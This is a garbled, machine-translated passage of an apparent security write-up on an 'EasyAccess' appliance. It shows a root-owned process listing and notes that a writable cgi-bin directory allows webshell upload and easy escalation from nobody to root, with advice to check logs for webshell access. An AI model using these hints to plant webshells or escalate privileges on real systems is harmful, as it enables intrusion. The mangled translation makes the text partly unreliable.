nobody   30395  0.0  0.2  25568  8788 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30396  0.0  0.2  25700 11908 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30397  0.0  0.2  25568  8788 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
root 	30465  2.0  0.1  13776  4612 ?    	S	10:21   0:00 /usr/src/EasyAccess/www/spog/exportDiagnostics
root 	30599  0.0  0.0   3480  1420 ?    	S	10:21   0:00 sh -c ps awux>>/tmp/status.txt 2>&1
root 	30600  0.0  0.0   2556   880 ?    	R	10:21   0:00 ps awux

Last , The important thing is to pay attention root The user to Web Server's cgi-bin Catalog ( /usr/src/EasyAccess/www/cgi-bin/) Have write permission , This allows them to webshel​​l Upload to the system . As mentioned earlier , adopt nobody Users upgrade to root It's simple . therefore , Review on http_request.logwebshel​​l A potential visit to may be beneficial . however , modify cgi-bin Does not persist between restarts ( Although whether a rebooted system is trustworthy after utilization is another matter ).

原网站

版权声明
本文为[Khan security team]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/01/202201132237439118.html

边栏推荐

猜你喜欢

随机推荐